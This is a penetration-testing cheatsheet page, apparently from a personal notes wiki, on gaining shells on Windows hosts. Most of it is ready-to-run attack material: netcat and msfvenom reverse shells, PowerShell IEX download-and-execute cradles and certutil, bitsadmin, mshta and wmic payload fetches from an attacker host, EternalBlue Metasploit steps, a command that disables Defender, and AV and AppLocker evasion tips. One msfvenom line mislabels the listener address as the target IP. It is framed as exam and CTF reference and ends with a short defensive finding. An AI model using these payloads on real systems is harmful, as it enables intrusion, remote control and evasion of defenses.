Field Manual

Shell Infiltrate Windows

3 min read

🛡️ Methodology Checklist

  • Identify RCE vector: exploit, command injection, webshell, upload
  • PowerShell reverse: download and exec Invoke-PowerShellTcp or nishang
  • Or use msfvenom EXE payload dropped and executed
  • Netcat for Windows: upload nc.exe then nc.exe [LHOST] [LPORT] -e cmd.exe
  • PowerShell one-liner from MSF: IEX (IWR 'http://[LHOST]/Invoke-PowerShellTcp.ps1' -UseBasicParsing); Invoke-PowerShellTcp -Reverse -IPAddress [LHOST] -Port [LPORT]
  • Start listener and catch shell
  • Migrate to stable process if Meterpreter

🎯 Operational Context

Use when: Delivering payload to Windows target — choose based on available LOL binaries: certutil, PowerShell IWR, SMB share, MSHTA, regsvr32. Think Dumber First: certutil -urlcache -split -f http://[LHOST]/shell.exe C:\Windows\Temp\s.exe — always available, rarely blocked. If that fails, PowerShell -c (New-Object Net.WebClient).DownloadFile('http://[LHOST]/shell.exe','C:\Temp\s.exe'). Skip when: AppLocker/WDAC blocks executable download — pivot to LOL techniques (regsvr32, mshta, wmic) that execute without writing EXE.

⚡ Tactical Cheatsheet

CommandTactical Outcome
ping [TARGET_IP]Check TTL: ~128 = Windows, ~64 = Linux
sudo nmap -v -O [TARGET_IP]OS detection via TCP/IP stack fingerprinting
sudo nmap -sC -sV [TARGET_IP]Service version scan + default scripts
use auxiliary/scanner/smb/smb_ms17_010Scan for EternalBlue vulnerability
use exploit/windows/smb/ms17_010_psexecExploit EternalBlue (stable psexec variant)
set RHOSTS [TARGET_IP]; set LHOST tun0; exploitRun EternalBlue exploit
use exploit/windows/smb/psexecAuthenticated RCE via PsExec (requires admin creds)
msfvenom -p windows/shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -f exe > shell.exeGenerate Windows reverse shell payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[TARGET_IP] LPORT=443 -f aspx -o shell.aspxIIS ASPX reverse shell
IEX(New-Object Net.WebClient).DownloadString('http://[TARGET_IP]/shell.ps1')Fileless PowerShell payload delivery
Set-MpPreference -DisableRealtimeMonitoring $trueDisable Windows Defender (lab only)

🔬 Deep Dive & Workflow

Critical Windows Vulnerabilities (Exam/CTF Reference)

VulnerabilityCVE / BulletinAttack SurfaceImpact
MS08-067MS08-067SMB flaw; used by Conficker/StuxnetRCE
EternalBlueMS17-010SMBv1; WannaCry/NotPetyaRCE / SYSTEM
BlueKeepCVE-2019-0708RDP — Win 2000 to Server 2008 R2RCE
PrintNightmareCVE-2021-1675Print Spooler — driver installationRCE / SYSTEM
SigredCVE-2020-1350DNS SIG record parsing on DCDomain Admin
ZerologonCVE-2020-1472Netlogon cryptographic flawDomain Admin
SeriousSamCVE-2021-36934SAM file permissions (via VSS)Credential Dump

OS Fingerprinting Techniques

  1. TTL ping — Windows ≈ 128, Linux ≈ 64 (ping [TARGET_IP])
  2. Nmap OS detectionsudo nmap -v -O [TARGET_IP] → looks for cpe:/o:microsoft:windows_*
  3. Banner grabbing — IIS version, RDP banners reveal Windows version

Windows Payload Types

FormatToolUse Case
.exeMSFvenomDirect execution
.ps1NishangFileless via IEX
.batManualSimple automation, very basic
.msiMSFvenommsiexec elevated execution
.dllCustomDLL hijacking / injection
.aspxMSFvenomIIS web server RCE

CMD vs PowerShell — When to Use Which

FeatureCMDPowerShell
Command history loggingNoYes (ScriptBlock logging)
Execution restrictionsNoneExecution Policy, AMSI
AvailabilityAll versions, including XPWin 7+ only
Best forStealth (CMD leaves less log)Complex post-ex scripts
Identify by promptC:\Windows\system32>PS C:\Windows\system32>

WSL and PowerShell Core — Blind Spots

  • WSL network traffic bypasses Windows Firewall and Defender — Python/Linux tools inside WSL can download and run payloads undetected
  • PowerShell Core on Linux carries over PS functions but has minimal EDR/AV monitoring

EternalBlue Quick Run

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS [TARGET_IP]
run
# If "likely VULNERABLE":
use exploit/windows/smb/ms17_010_psexec
set RHOSTS [TARGET_IP]; set LHOST tun0
set payload windows/meterpreter/reverse_tcp
exploit

🛠️ Troubleshooting & Edge Cases

ProblemCauseFix
certutil download blocked by AVcertutil.exe flaggedUse bitsadmin /transfer job /download /priority high http://[LHOST]/shell.exe C:\Temp\s.exe
PowerShell IWR returns 403Server-side filtering by UAAdd: -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
SMB file share not accessible from targetSMB port 445 blockedUse HTTP delivery; or UNC path via WebDAV: \\[LHOST]@80\share\shell.exe
Downloaded EXE flagged on writeReal-time AV scanning downloadsDeliver shellcode via reflective loading or PowerShell memory execution — no file touch
regsvr32 COM scriptlet blockedAppLocker rule for regsvr32Try mshta http://[LHOST]/payload.hta or wmic os get /format:"http://[LHOST]/payload.xsl"

📝 Reporting Trigger

Finding Title: Windows Payload Delivery via Built-In LOL Binaries Impact: Windows LOL binaries (certutil, bitsadmin, mshta) bypass application allowlisting and deliver attacker payloads without dropping detectable EXE artifacts, enabling code execution under legitimate system process context. Root Cause: LOL binaries are signed Microsoft binaries exempt from application allowlisting. No behavioral monitoring of LOL binary network activity. Recommendation: Enable WDAC rules specifically restricting LOL binary network access. Implement network-level monitoring for certutil/bitsadmin HTTP requests. Deploy Script Block Logging for PowerShell download cradles.

🔗 Related Nodes

Graph View

Backlinks